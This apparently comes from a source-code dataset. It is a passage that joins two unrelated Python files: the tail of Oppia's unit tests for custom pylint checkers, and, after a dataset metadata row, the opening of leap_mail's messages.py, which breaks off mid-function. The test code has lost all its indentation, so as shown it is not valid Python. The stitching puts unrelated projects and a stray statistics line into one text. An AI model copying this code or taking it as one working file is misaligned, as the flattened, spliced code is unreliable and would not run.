node.path = filename
checker_test_object.checker.process_module(node)
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='backslash-continuation',
line=1
),
testutils.Message(
msg_id='backslash-continuation',
line=2
),
):
temp_file.close()
class FunctionArgsOrderCheckerTests(unittest.TestCase):
def test_finds_function_def(self):
checker_test_object = testutils.CheckerTestCase()
checker_test_object.CHECKER_CLASS = (
pylint_extensions.FunctionArgsOrderChecker)
checker_test_object.setup_method()
functiondef_node1 = astroid.extract_node(
"""
def test(self,test_var_one, test_var_two): #@
result = test_var_one + test_var_two
return result
""")
with checker_test_object.assertNoMessages():
checker_test_object.checker.visit_functiondef(functiondef_node1)
functiondef_node2 = astroid.extract_node(
"""
def test(test_var_one, test_var_two, self): #@
result = test_var_one + test_var_two
return result
""")
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='function-args-order-self',
node=functiondef_node2
),
):
checker_test_object.checker.visit_functiondef(functiondef_node2)
functiondef_node3 = astroid.extract_node(
"""
def test(test_var_one, test_var_two, cls): #@
result = test_var_one + test_var_two
return result
""")
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='function-args-order-cls',
node=functiondef_node3
),
):
checker_test_object.checker.visit_functiondef(functiondef_node3)
class RestrictedImportCheckerTests(unittest.TestCase):
def test_detect_restricted_import(self):
checker_test_object = testutils.CheckerTestCase()
checker_test_object.CHECKER_CLASS = (
pylint_extensions.RestrictedImportChecker)
checker_test_object.setup_method()
# Tests the case wherein storage layer imports domain layer
# in import statements.
node_err_import = astroid.extract_node(
"""
import core.domain.activity_domain #@
""")
node_err_import.root().name = 'oppia.core.storage.topic'
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='invalid-import',
node=node_err_import,
args=('domain', 'storage'),
),
):
checker_test_object.checker.visit_import(node_err_import)
# Tests the case wherein storage layer does not import domain layer
# in import statements.
node_no_err_import = astroid.extract_node(
"""
import core.platform.email.mailgun_email_services #@
""")
node_no_err_import.root().name = 'oppia.core.storage.topic'
with checker_test_object.assertNoMessages():
checker_test_object.checker.visit_import(node_no_err_import)
# Tests the case wherein storage layer imports domain layer
# in import-from statements.
node_err_importfrom = astroid.extract_node(
"""
from core.domain import activity_domain #@
""")
node_err_importfrom.root().name = 'oppia.core.storage.topic'
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='invalid-import',
node=node_err_importfrom,
args=('domain', 'storage'),
)
):
checker_test_object.checker.visit_importfrom(node_err_importfrom)
# Tests the case wherein storage layer does not import domain layer
# in import-from statements.
node_no_err_importfrom = astroid.extract_node(
"""
from core.platform.email import mailgun_email_services #@
""")
        node_no_err_importfrom.root().name = 'oppia.core.storage.topic'
with checker_test_object.assertNoMessages():
checker_test_object.checker.visit_importfrom(node_no_err_importfrom)
# Tests the case wherein domain layer imports controller layer
# in import statements.
node_err_import = astroid.extract_node(
"""
import core.controllers.acl_decorators #@
""")
node_err_import.root().name = 'oppia.core.domain'
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='invalid-import',
node=node_err_import,
args=('controller', 'domain'),
),
):
checker_test_object.checker.visit_import(node_err_import)
# Tests the case wherein domain layer does not import controller layer
# in import statements.
node_no_err_import = astroid.extract_node(
"""
import core.platform.email.mailgun_email_services_test #@
""")
node_no_err_import.root().name = 'oppia.core.domain'
with checker_test_object.assertNoMessages():
checker_test_object.checker.visit_import(node_no_err_import)
# Tests the case wherein domain layer imports controller layer
# in import-from statements.
node_err_importfrom = astroid.extract_node(
"""
from core.controllers import acl_decorators #@
""")
node_err_importfrom.root().name = 'oppia.core.domain'
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='invalid-import',
node=node_err_importfrom,
args=('controller', 'domain'),
)
):
checker_test_object.checker.visit_importfrom(node_err_importfrom)
# Tests the case wherein domain layer does not import controller layer
# in import-from statements.
node_no_err_importfrom = astroid.extract_node(
"""
from core.platform.email import mailgun_email_services_test #@
""")
node_no_err_importfrom.root().name = 'oppia.core.domain'
with checker_test_object.assertNoMessages():
checker_test_object.checker.visit_importfrom(node_no_err_importfrom)
class SingleCharAndNewlineAtEOFCheckerTests(unittest.TestCase):
def test_checks_single_char_and_newline_eof(self):
checker_test_object = testutils.CheckerTestCase()
checker_test_object.CHECKER_CLASS = (
pylint_extensions.SingleCharAndNewlineAtEOFChecker)
checker_test_object.setup_method()
node_missing_newline_at_eof = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""c = 'something dummy'
""")
node_missing_newline_at_eof.file = filename
node_missing_newline_at_eof.path = filename
checker_test_object.checker.process_module(node_missing_newline_at_eof)
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='newline-at-eof',
line=2
),
):
temp_file.close()
node_single_char_file = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(u"""1""")
node_single_char_file.file = filename
node_single_char_file.path = filename
checker_test_object.checker.process_module(node_single_char_file)
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='only-one-character',
line=1
),
):
temp_file.close()
node_with_no_error_message = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(u"""x = 'something dummy'""")
node_with_no_error_message.file = filename
node_with_no_error_message.path = filename
checker_test_object.checker.process_module(node_with_no_error_message)
with checker_test_object.assertNoMessages():
temp_file.close()
class SingleSpaceAfterYieldTests(unittest.TestCase):
def setUp(self):
super(SingleSpaceAfterYieldTests, self).setUp()
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.SingleSpaceAfterYieldChecker)
self.checker_test_object.setup_method()
def test_well_formed_yield_statement_on_single_line(self):
node_well_formed_one_line_yield_file = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""def helloworld():
\"\"\"Below is the yield statement.\"\"\"
yield (5, 2)
""")
node_well_formed_one_line_yield_file.file = filename
node_well_formed_one_line_yield_file.path = filename
node_well_formed_one_line_yield_file.fromlineno = 3
self.checker_test_object.checker.visit_yield(
node_well_formed_one_line_yield_file)
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_well_formed_yield_statement_on_multiple_lines(self):
node_well_formed_mult_lines_file = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""def helloworld():
yield (
'This line was too long to be put on one line.')
""")
node_well_formed_mult_lines_file.file = filename
node_well_formed_mult_lines_file.path = filename
node_well_formed_mult_lines_file.fromlineno = 2
self.checker_test_object.checker.visit_yield(
node_well_formed_mult_lines_file)
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_yield_nothing(self):
yield_nothing_file = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""def helloworld():
yield
""")
yield_nothing_file.file = filename
yield_nothing_file.path = filename
yield_nothing_file.fromlineno = 2
self.checker_test_object.checker.visit_yield(
yield_nothing_file)
# No errors on yield statements that do nothing.
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_yield_in_multi_line_comment(self):
yield_in_multiline_file = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""def helloworld():
\"\"\"
yield(\"invalid yield format\")
\"\"\"
extract_node(\"\"\"
yield (invalid)
\"\"\")
extract_node(
b\"\"\"
yield(1, 2)
\"\"\")
extract_node(
u\"\"\"
yield(3, 4)
\"\"\")
)
""")
yield_in_multiline_file.file = filename
yield_in_multiline_file.path = filename
self.checker_test_object.checker.visit_yield(
yield_in_multiline_file)
# No errors on yield statements in multi-line comments.
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_too_many_spaces_after_yield_statement(self):
node_too_many_spaces_after_yield_file = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""def helloworld():
yield (5, 2)
""")
node_too_many_spaces_after_yield_file.file = filename
node_too_many_spaces_after_yield_file.path = filename
node_too_many_spaces_after_yield_file.fromlineno = 2
self.checker_test_object.checker.visit_yield(
node_too_many_spaces_after_yield_file)
message = testutils.Message(
msg_id='single-space-after-yield',
node=node_too_many_spaces_after_yield_file)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_no_space_after_yield_statement(self):
node_no_spaces_after_yield_file = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""def helloworld():
yield(5, 2)
""")
node_no_spaces_after_yield_file.file = filename
node_no_spaces_after_yield_file.path = filename
node_no_spaces_after_yield_file.fromlineno = 2
self.checker_test_object.checker.visit_yield(
node_no_spaces_after_yield_file)
message = testutils.Message(
msg_id='single-space-after-yield',
node=node_no_spaces_after_yield_file)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
class DivisionOperatorCheckerTests(unittest.TestCase):
def setUp(self):
super(DivisionOperatorCheckerTests, self).setUp()
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.DivisionOperatorChecker)
self.checker_test_object.setup_method()
def test_division_operator_with_spaces(self):
node_division_operator_with_spaces = astroid.extract_node(
u"""
a / b #@
""")
message = testutils.Message(
msg_id='division-operator-used',
node=node_division_operator_with_spaces)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_binop(
node_division_operator_with_spaces)
def test_division_operator_without_spaces(self):
node_division_operator_without_spaces = astroid.extract_node(
u"""
a/b #@
""")
message = testutils.Message(
msg_id='division-operator-used',
node=node_division_operator_without_spaces)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_binop(
node_division_operator_without_spaces)
class SingleLineCommentCheckerTests(unittest.TestCase):
def setUp(self):
super(SingleLineCommentCheckerTests, self).setUp()
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.SingleLineCommentChecker)
self.checker_test_object.setup_method()
def test_invalid_punctuation(self):
node_invalid_punctuation = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""# This is a multiline
# comment/
# Comment.
""")
node_invalid_punctuation.file = filename
node_invalid_punctuation.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_invalid_punctuation))
message = testutils.Message(
msg_id='invalid-punctuation-used',
line=2)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_no_space_at_beginning(self):
node_no_space_at_beginning = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""#Something.
""")
node_no_space_at_beginning.file = filename
node_no_space_at_beginning.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_no_space_at_beginning))
message = testutils.Message(
msg_id='no-space-at-beginning',
line=1)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_no_capital_letter_at_beginning(self):
node_no_capital_letter_at_beginning = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""# coding: utf-8
# something.
""")
node_no_capital_letter_at_beginning.file = filename
node_no_capital_letter_at_beginning.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_no_capital_letter_at_beginning))
message = testutils.Message(
msg_id='no-capital-letter-at-beginning',
line=3)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_comment_with_excluded_phrase(self):
node_comment_with_excluded_phrase = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""# coding: utf-8
# pylint: disable
a = 1 + 2 # pylint: disable
""")
node_comment_with_excluded_phrase.file = filename
node_comment_with_excluded_phrase.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_comment_with_excluded_phrase))
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_variable_name_in_comment(self):
node_variable_name_in_comment = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""# coding: utf-8
# variable_name is used.
""")
node_variable_name_in_comment.file = filename
node_variable_name_in_comment.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_variable_name_in_comment))
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_comment_with_version_info(self):
node_comment_with_version_info = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""# coding: utf-8
# v2 is used.
""")
node_comment_with_version_info.file = filename
node_comment_with_version_info.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_comment_with_version_info))
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_data_type_in_comment(self):
node_data_type_in_comment = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""# coding: utf-8
# str. variable is type of str.
""")
node_data_type_in_comment.file = filename
node_data_type_in_comment.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_data_type_in_comment))
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_comment_inside_docstring(self):
node_comment_inside_docstring = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""# coding: utf-8
\"\"\"# str. variable is type of str.\"\"\"
\"\"\"# str. variable is type
of str.\"\"\"
""")
node_comment_inside_docstring.file = filename
node_comment_inside_docstring.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_comment_inside_docstring))
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_well_formed_comment(self):
node_with_no_error_message = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""# coding: utf-8
# Multi
# line
# comment.
""")
node_with_no_error_message.file = filename
node_with_no_error_message.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_with_no_error_message))
with self.checker_test_object.assertNoMessages():
temp_file.close()
class BlankLineBelowFileOverviewCheckerTests(unittest.TestCase):
def setUp(self):
super(BlankLineBelowFileOverviewCheckerTests, self).setUp()
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.BlankLineBelowFileOverviewChecker)
self.checker_test_object.setup_method()
def test_no_empty_line_below_fileoverview(self):
node_no_empty_line_below_fileoverview = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
\"\"\" this file does something \"\"\"
import something
import random
""")
node_no_empty_line_below_fileoverview.file = filename
node_no_empty_line_below_fileoverview.path = filename
node_no_empty_line_below_fileoverview.fromlineno = 2
self.checker_test_object.checker.visit_module(
node_no_empty_line_below_fileoverview)
message = testutils.Message(
msg_id='no-empty-line-provided-below-fileoverview',
node=node_no_empty_line_below_fileoverview)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_extra_empty_lines_below_fileoverview(self):
node_extra_empty_lines_below_fileoverview = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
\"\"\" this file does something \"\"\"
import something
from something import random
""")
node_extra_empty_lines_below_fileoverview.file = filename
node_extra_empty_lines_below_fileoverview.path = filename
node_extra_empty_lines_below_fileoverview.fromlineno = 2
self.checker_test_object.checker.visit_module(
node_extra_empty_lines_below_fileoverview)
message = testutils.Message(
msg_id='only-a-single-empty-line-should-be-provided',
node=node_extra_empty_lines_below_fileoverview)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_extra_empty_lines_below_fileoverview_with_unicode_characters(self):
node_extra_empty_lines_below_fileoverview = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
#this comment has a unicode character \u2713
\"\"\" this file does \u2715 something \"\"\"
from something import random
""")
node_extra_empty_lines_below_fileoverview.file = filename
node_extra_empty_lines_below_fileoverview.path = filename
node_extra_empty_lines_below_fileoverview.fromlineno = 3
self.checker_test_object.checker.visit_module(
node_extra_empty_lines_below_fileoverview)
message = testutils.Message(
msg_id='only-a-single-empty-line-should-be-provided',
node=node_extra_empty_lines_below_fileoverview)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_no_empty_line_below_fileoverview_with_unicode_characters(self):
node_no_empty_line_below_fileoverview = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
#this comment has a unicode character \u2713
\"\"\" this file does \u2715 something \"\"\"
import something
import random
""")
node_no_empty_line_below_fileoverview.file = filename
node_no_empty_line_below_fileoverview.path = filename
node_no_empty_line_below_fileoverview.fromlineno = 3
self.checker_test_object.checker.visit_module(
node_no_empty_line_below_fileoverview)
message = testutils.Message(
msg_id='no-empty-line-provided-below-fileoverview',
node=node_no_empty_line_below_fileoverview)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_single_new_line_below_file_overview(self):
node_with_no_error_message = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
\"\"\" this file does something \"\"\"
import something
import random
""")
node_with_no_error_message.file = filename
node_with_no_error_message.path = filename
node_with_no_error_message.fromlineno = 2
self.checker_test_object.checker.visit_module(
node_with_no_error_message)
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_file_with_no_file_overview(self):
node_file_with_no_file_overview = astroid.scoped_nodes.Module(
name='test',
doc=None)
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
import something
import random
""")
node_file_with_no_file_overview.file = filename
node_file_with_no_file_overview.path = filename
self.checker_test_object.checker.visit_module(
node_file_with_no_file_overview)
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_file_overview_at_end_of_file(self):
node_file_overview_at_end_of_file = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
\"\"\" this file does something \"\"\" """)
node_file_overview_at_end_of_file.file = filename
node_file_overview_at_end_of_file.path = filename
node_file_overview_at_end_of_file.fromlineno = 2
self.checker_test_object.checker.visit_module(
node_file_overview_at_end_of_file)
message = testutils.Message(
msg_id='only-a-single-empty-line-should-be-provided',
node=node_file_overview_at_end_of_file)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
class SingleLinePragmaCheckerTests(unittest.TestCase):
def setUp(self):
super(SingleLinePragmaCheckerTests, self).setUp()
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.SingleLinePragmaChecker)
self.checker_test_object.setup_method()
def test_pragma_for_multiline(self):
node_pragma_for_multiline = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
# pylint: disable=invalid-name
def funcName():
\"\"\" # pylint: disable=test-purpose\"\"\"
pass
# pylint: enable=invalid-name
""")
node_pragma_for_multiline.file = filename
node_pragma_for_multiline.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_pragma_for_multiline))
message1 = testutils.Message(
msg_id='single-line-pragma',
line=2)
message2 = testutils.Message(
msg_id='single-line-pragma',
line=6)
with self.checker_test_object.assertAddsMessages(
message1, message2):
temp_file.close()
def test_enable_single_line_pragma_for_multiline(self):
node_enable_single_line_pragma_for_multiline = (
astroid.scoped_nodes.Module(name='test', doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
# pylint: disable=single-line-pragma
def func():
\"\"\"
# pylint: disable=testing-purpose
\"\"\"
pass
# pylint: enable=single-line-pragma
""")
node_enable_single_line_pragma_for_multiline.file = filename
node_enable_single_line_pragma_for_multiline.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_enable_single_line_pragma_for_multiline))
message = testutils.Message(
msg_id='single-line-pragma',
line=2)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_enable_single_line_pragma_with_invalid_name(self):
node_enable_single_line_pragma_with_invalid_name = (
astroid.scoped_nodes.Module(name='test', doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
# pylint: disable=invalid-name, single-line-pragma
def funcName():
\"\"\"
# pylint: disable=testing-purpose
\"\"\"
pass
# pylint: enable=invalid_name, single-line-pragma
""")
node_enable_single_line_pragma_with_invalid_name.file = filename
node_enable_single_line_pragma_with_invalid_name.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(
node_enable_single_line_pragma_with_invalid_name))
message = testutils.Message(
msg_id='single-line-pragma',
line=2)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
def test_single_line_pylint_pragma(self):
node_with_no_error_message = (
astroid.scoped_nodes.Module(name='test', doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
def funcName(): # pylint: disable=single-line-pragma
pass
""")
node_with_no_error_message.file = filename
node_with_no_error_message.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_with_no_error_message))
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_no_and_extra_space_before_pylint(self):
node_no_and_extra_space_before_pylint = (
astroid.scoped_nodes.Module(name='test', doc='Custom test'))
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""
# pylint:disable=single-line-pragma
def func():
\"\"\"
# pylint: disable=testing-purpose
\"\"\"
pass
# pylint: enable=single-line-pragma
""")
node_no_and_extra_space_before_pylint.file = filename
node_no_and_extra_space_before_pylint.path = filename
self.checker_test_object.checker.process_tokens(
utils.tokenize_module(node_no_and_extra_space_before_pylint))
message = testutils.Message(
msg_id='single-line-pragma',
line=2)
with self.checker_test_object.assertAddsMessages(message):
temp_file.close()
|
apache-2.0
| -8,516,299,864,697,384,000 | 35.07111 | 100 | 0.549699 | false |
kalikaneko/leap_mail
|
src/leap/mail/imap/messages.py
|
1
|
45971
|
# -*- coding: utf-8 -*-
# messages.py
# Copyright (C) 2013 LEAP
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
LeapMessage and MessageCollection.
"""
import copy
import logging
import re
import threading
import StringIO
from collections import defaultdict
from functools import partial
from twisted.mail import imap4
from twisted.internet import defer
from twisted.python import log
from zope.interface import implements
from zope.proxy import sameProxiedObjects
from leap.common.check import leap_assert, leap_assert_type
from leap.common.decorators import memoized_method
from leap.common.mail import get_email_charset
from leap.mail import walk
from leap.mail.utils import first, find_charset, lowerdict, empty
from leap.mail.utils import stringify_parts_map
from leap.mail.decorators import deferred_to_thread
from leap.mail.imap.index import IndexedDB
from leap.mail.imap.fields import fields, WithMsgFields
from leap.mail.imap.memorystore import MessageWrapper
from leap.mail.imap.messageparts import MessagePart
from leap.mail.imap.parser import MailParser, MBoxParser
logger = logging.getLogger(__name__)
# TODO ------------------------------------------------------------
# [ ] Add ref to incoming message during add_msg
# [ ] Add linked-from info.
# * Need a new type of documents: linkage info.
# * HDOCS are linked from FDOCs (ref to chash)
# * CDOCS are linked from HDOCS (ref to chash)
# [ ] Delete incoming mail only after successful write!
# [ ] Remove UID from syncable db. Store only those indexes locally.
MSGID_PATTERN = r"""<([\w@.]+)>"""
MSGID_RE = re.compile(MSGID_PATTERN)
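# For illustration: the pattern extracts the bare identifier from an
# RFC 2822 Message-ID header value, e.g.
#   MSGID_RE.findall("<[email protected]>")  ->  ["[email protected]"]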
def try_unique_query(curried):
"""
Try to execute a query that is expected to have a
single outcome, and log a warning if more than one document found.
:param curried: a curried function
:type curried: callable
"""
leap_assert(callable(curried), "A callable is expected")
try:
query = curried()
if query:
if len(query) > 1:
# TODO we could take action, like trigger a background
# process to kill dupes.
name = getattr(curried, 'expected', 'doc')
logger.warning(
"More than one %s found for this mbox, "
"we got a duplicate!!" % (name,))
return query.pop()
else:
return None
except Exception as exc:
logger.exception("Unhandled error %r" % exc)
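# A minimal usage sketch, mirroring how the collection code below builds
# its curried queries (``soledad`` stands in for a Soledad instance):
#
#     curried = partial(soledad.get_from_index,
#                       fields.TYPE_MBOX_IDX,
#                       fields.TYPE_RECENT_VAL, "inbox")
#     curried.expected = "rdoc"
#     rdoc = try_unique_query(curried)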
class LeapMessage(fields, MailParser, MBoxParser):
"""
The main representation of a message.
It indexes the messages in one mailbox by a combination
of uid+mailbox name.
"""
# TODO this has to change.
# Should index primarily by chash, and keep a local-only
# UID table.
implements(imap4.IMessage)
flags_lock = threading.Lock()
def __init__(self, soledad, uid, mbox, collection=None, container=None):
"""
Initializes a LeapMessage.
:param soledad: a Soledad instance
:type soledad: Soledad
:param uid: the UID for the message.
:type uid: int or basestring
:param mbox: the mbox this message belongs to
:type mbox: str or unicode
:param collection: a reference to the parent collection object
:type collection: MessageCollection
:param container: a IMessageContainer implementor instance
:type container: IMessageContainer
"""
MailParser.__init__(self)
self._soledad = soledad
self._uid = int(uid)
self._mbox = self._parse_mailbox_name(mbox)
self._collection = collection
self._container = container
self.__chash = None
self.__bdoc = None
# XXX make these properties public
@property
def _fdoc(self):
"""
An accessor to the flags document.
"""
if all(map(bool, (self._uid, self._mbox))):
fdoc = None
if self._container is not None:
fdoc = self._container.fdoc
if not fdoc:
fdoc = self._get_flags_doc()
if fdoc:
fdoc_content = fdoc.content
self.__chash = fdoc_content.get(
fields.CONTENT_HASH_KEY, None)
return fdoc
@property
def _hdoc(self):
"""
An accessor to the headers document.
"""
if self._container is not None:
hdoc = self._container.hdoc
if hdoc and not empty(hdoc.content):
return hdoc
# XXX cache this into the memory store !!!
return self._get_headers_doc()
@property
def _chash(self):
"""
An accessor to the content hash for this message.
"""
if not self._fdoc:
return None
if not self.__chash and self._fdoc:
self.__chash = self._fdoc.content.get(
fields.CONTENT_HASH_KEY, None)
return self.__chash
@property
def _bdoc(self):
"""
An accessor to the body document.
"""
if not self._hdoc:
return None
if not self.__bdoc:
self.__bdoc = self._get_body_doc()
return self.__bdoc
# IMessage implementation
def getUID(self):
"""
Retrieve the unique identifier associated with this Message.
:return: uid for this message
:rtype: int
"""
return self._uid
def getFlags(self):
"""
Retrieve the flags associated with this Message.
:return: The flags, represented as strings
:rtype: tuple
"""
uid = self._uid
flags = set([])
fdoc = self._fdoc
if fdoc:
            flags = set(fdoc.content.get(self.FLAGS_KEY, []))
msgcol = self._collection
# We treat the recent flag specially: gotten from
# a mailbox-level document.
if msgcol and uid in msgcol.recent_flags:
flags.add(fields.RECENT_FLAG)
if flags:
flags = map(str, flags)
return tuple(flags)
# setFlags not in the interface spec but we use it with store command.
def setFlags(self, flags, mode):
"""
Sets the flags for this message
:param flags: the flags to update in the message.
:type flags: tuple of str
:param mode: the mode for setting. 1 is append, -1 is remove, 0 set.
:type mode: int
"""
leap_assert(isinstance(flags, tuple), "flags need to be a tuple")
log.msg('setting flags: %s (%s)' % (self._uid, flags))
doc = self._fdoc
if not doc:
logger.warning(
"Could not find FDOC for %s:%s while setting flags!" %
(self._mbox, self._uid))
return
APPEND = 1
REMOVE = -1
SET = 0
with self.flags_lock:
current = doc.content[self.FLAGS_KEY]
if mode == APPEND:
newflags = tuple(set(tuple(current) + flags))
